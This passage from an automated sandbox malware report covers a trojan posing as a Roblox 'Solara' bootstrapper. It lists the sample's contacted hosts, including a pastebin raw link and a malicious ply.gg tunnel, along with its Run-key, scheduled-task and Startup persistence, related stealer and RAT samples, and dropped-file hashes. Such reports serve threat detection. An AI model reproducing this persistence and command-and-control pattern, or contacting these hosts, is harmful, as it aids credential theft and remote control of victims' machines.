                                                                                                                                                                    http://nodejs.orgdddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://clientsettings.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msidddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://pastebin.com/raw/pjseRvyKYgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://clientsettings.roblox.comdddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://peps.python.org/pep-0263/YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                		high

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                208.95.112.1
                                                                                                                                                                                		ip-api.comUnited States
                                                                                                                                                                                		53334TUT-ASUSfalse
                                                                                                                                                                                128.116.123.3
                                                                                                                                                                                		edge-term4-fra2.roblox.comUnited States
                                                                                                                                                                                		22697ROBLOX-PRODUCTIONUSfalse
                                                                                                                                                                                104.21.93.27
                                                                                                                                                                                		getsolara.devUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                104.20.22.46
                                                                                                                                                                                		nodejs.orgUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                147.185.221.18
                                                                                                                                                                                		hope-asia.gl.at.ply.ggUnited States
                                                                                                                                                                                		12087SALSGIVERUStrue

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1579069
                                                                                                                                                                                Start date and time:2024-12-20 19:02:10 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 10m 55s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:43
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:YgJ5inWPQO.exe
                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                Original Sample Name:fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@49/42@6/6
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 25%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 64%
                                                                                                                                                                                • Number of executed functions: 126
                                                                                                                                                                                • Number of non-executed functions: 222
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.189.173.22, 52.149.20.212, 40.126.53.13, 20.12.23.50, 13.107.246.63
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Execution Graph export aborted for target System User.exe, PID 1976 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target System User.exe, PID 2296 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target System User.exe, PID 7868 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target System User.exe, PID 8160 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target dddd.exe, PID 6476 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2212 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 4932 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7288 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                • VT rate limit hit for: YgJ5inWPQO.exe

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                13:03:19API Interceptor71x Sleep call for process: dddd.exe modified
                                                                                                                                                                                13:03:20API Interceptor66x Sleep call for process: powershell.exe modified
                                                                                                                                                                                13:03:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                13:04:28API Interceptor72x Sleep call for process: msedge.exe modified
                                                                                                                                                                                19:04:29Task SchedulerRun new task: System User path: C:\Users\user\AppData\Roaming\System s>User.exe
                                                                                                                                                                                19:04:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System User C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                19:04:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System User C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                19:04:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                208.95.112.1KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                • ip-api.com/json
                                                                                                                                                                                xt.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                • ip-api.com/json
                                                                                                                                                                                roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                • ip-api.com/json
                                                                                                                                                                                random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                • ip-api.com/json

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                getsolara.devwmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                sDKRz09zM7.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 172.67.203.125
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                edge-term4-fra2.roblox.comwmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                • 128.116.123.4
                                                                                                                                                                                oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 128.116.123.4
                                                                                                                                                                                hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 128.116.123.4
                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.123.4
                                                                                                                                                                                nodejs.orgwp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 104.20.23.46

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                ROBLOX-PRODUCTIONUSarmv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 209.206.45.42
                                                                                                                                                                                wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                sDKRz09zM7.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.119.3
                                                                                                                                                                                8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                TUT-ASUSKJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                xt.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                CLOUDFLARENETUShttp://url4659.orders.vanillagift.com/ls/click?upn=u001.4gSefN7qGt7uZc-2BljvSfDuK9c6f7zz-2BRDdNLkOmxp-2BfCpVRV4q5JSM05F18NmhW9aTh4D-2B-2FvKc3l62XSGdMxHErqjDyHVaRGnhWtdaxelWfxz8x2-2FY7A4qgb3tzDonO-2BR4v55hRVWLW8mGedQ4WKyhGmLG6TdN0VE3FuoaMfqbWnIJZADjzcMmwi0-2FbwmmeKkdfIhUk0sBHSi9RcRmdsfuOZwL5O2zEB6UFf08dp06kJXruK-2BF70HVCIIa3GSMCo48RLkzWG8dEOH-2FBZmckwy2IyrmhGk7TORgwM5bk4PbUxQPoYKq7IdXZDoj7BBWFZXgs6KkXD1kVfgQOsMLEKQeTvK5ATiMGw5YUv9FTPZiWgh4O-2B6hR3uc5gCam5ygOCJsmG3ya5dOP3AzZxmtrQO2ixrFnkLK-2Bkk5ChvTn26C-2BioOkvRUSczMMaDc3goe-2FffK-2FLybPlPtaG8BM0aogkRmbjy7uKwhjOW-2BFQyWewVzg-3DIgAR_79LTZgGyJjQA0yKF2CHqblXBaDJuc2sNW7Piu5vjvmdwcqDrB-2Buw9ZQukwHO-2BFDa1Pj-2BnPyP1wnuiUj8o1jeVFZ-2B0yTi1w6olXhC5xGcnSuX-2FPX8EC9nfY-2B3npShVzZ4Fae90bxak04TDiCsiP7PmtAOagYeRI4FU2qDP2MtD3eIC1vtRjmGkonGMDUW1rPFYKa2pBviC8swsnzOU26q7ssqOo-2FLjO6-2B2IyWprhTXXBsBk2HZWehLV3F8Prl0XOgIIe0Oi6f3V8mliLO9NN8Iw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.19.230.21
                                                                                                                                                                                phish_alert_iocp_v1.10.16(15).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.19.229.21
                                                                                                                                                                                https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 172.67.183.243
                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                • 172.67.177.134
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                • 172.67.197.170
                                                                                                                                                                                Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                • 104.21.67.152
                                                                                                                                                                                Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.90.135
                                                                                                                                                                                Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.86.72
                                                                                                                                                                                CLOUDFLARENETUShttp://url4659.orders.vanillagift.com/ls/click?upn=u001.4gSefN7qGt7uZc-2BljvSfDuK9c6f7zz-2BRDdNLkOmxp-2BfCpVRV4q5JSM05F18NmhW9aTh4D-2B-2FvKc3l62XSGdMxHErqjDyHVaRGnhWtdaxelWfxz8x2-2FY7A4qgb3tzDonO-2BR4v55hRVWLW8mGedQ4WKyhGmLG6TdN0VE3FuoaMfqbWnIJZADjzcMmwi0-2FbwmmeKkdfIhUk0sBHSi9RcRmdsfuOZwL5O2zEB6UFf08dp06kJXruK-2BF70HVCIIa3GSMCo48RLkzWG8dEOH-2FBZmckwy2IyrmhGk7TORgwM5bk4PbUxQPoYKq7IdXZDoj7BBWFZXgs6KkXD1kVfgQOsMLEKQeTvK5ATiMGw5YUv9FTPZiWgh4O-2B6hR3uc5gCam5ygOCJsmG3ya5dOP3AzZxmtrQO2ixrFnkLK-2Bkk5ChvTn26C-2BioOkvRUSczMMaDc3goe-2FffK-2FLybPlPtaG8BM0aogkRmbjy7uKwhjOW-2BFQyWewVzg-3DIgAR_79LTZgGyJjQA0yKF2CHqblXBaDJuc2sNW7Piu5vjvmdwcqDrB-2Buw9ZQukwHO-2BFDa1Pj-2BnPyP1wnuiUj8o1jeVFZ-2B0yTi1w6olXhC5xGcnSuX-2FPX8EC9nfY-2B3npShVzZ4Fae90bxak04TDiCsiP7PmtAOagYeRI4FU2qDP2MtD3eIC1vtRjmGkonGMDUW1rPFYKa2pBviC8swsnzOU26q7ssqOo-2FLjO6-2B2IyWprhTXXBsBk2HZWehLV3F8Prl0XOgIIe0Oi6f3V8mliLO9NN8Iw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.19.230.21
                                                                                                                                                                                phish_alert_iocp_v1.10.16(15).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.19.229.21
                                                                                                                                                                                https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 172.67.183.243
                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                • 104.21.84.113
                                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                • 172.67.177.134
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                • 172.67.197.170
                                                                                                                                                                                Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                • 104.21.67.152
                                                                                                                                                                                Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.90.135
                                                                                                                                                                                Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.86.72

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eP0RN-vidz.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                2AIgdyA1Cl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                mniscreenthinkinggoodforentiretimegoodfotbusubessthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                                ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                • 128.116.123.3
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                • 104.20.22.46

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dllwp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                  wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                    wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                      wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                        WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                          WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                            chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                ahost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                  PixelFlasher.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_dddd.exe_af393cc9913219998438774698f8342c562_9e3dda42_6bf57e09-797d-465b-954e-e36e0306d837\Report.wer

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):1.2564849147072306
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:lKuBAdr0bU9+dQlaWxejol2/fsLzuiF1Z24lO8J:cuBACbG+dQlaGl23sLzuiF1Y4lO8J
                                                                                                                                                                                                    MD5:FD1D8A1E04AF77B12B4C7821BA254246
                                                                                                                                                                                                    SHA1:0046A2784EDDB2F7B24BA2E56F134F42C8455A14
                                                                                                                                                                                                    SHA-256:A6771D3A837FDA4BCCFEDA217E89EEAC2819EF8670EE8EC676FC3DBA4FE595E7
                                                                                                                                                                                                    SHA-512:C6A6CA011F4C92CE3321C12107E005336AB68F4A6C5E3DFC605FFAE15811BB71E56F4CB73264FF4CD2BC815AE37E809C9A349C32B05E18DF6818FCD8368D1037
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.9.1.4.0.8.6.6.8.0.1.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.9.1.4.0.9.4.0.2.3.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.f.5.7.e.0.9.-.7.9.7.d.-.4.6.5.b.-.9.5.4.e.-.e.3.6.e.0.3.0.6.d.8.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.b.7.b.d.2.0.-.8.9.a.e.-.4.e.f.0.-.9.c.c.1.-.9.1.0.f.a.b.c.1.6.8.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.d.d.d.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.c.-.0.0.0.1.-.0.0.1.4.-.9.2.c.1.-.3.6.7.0.0.9.5.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.0.2.3.1.a.4.6.7.a.4.9.c.c.3.7.7.6.8.e.e.a.0.f.5.5.f.4.b.e.a.1.c.b.f.b.4.8.e.2.!.d.d.d.d...e.x.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3944.tmp.dmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
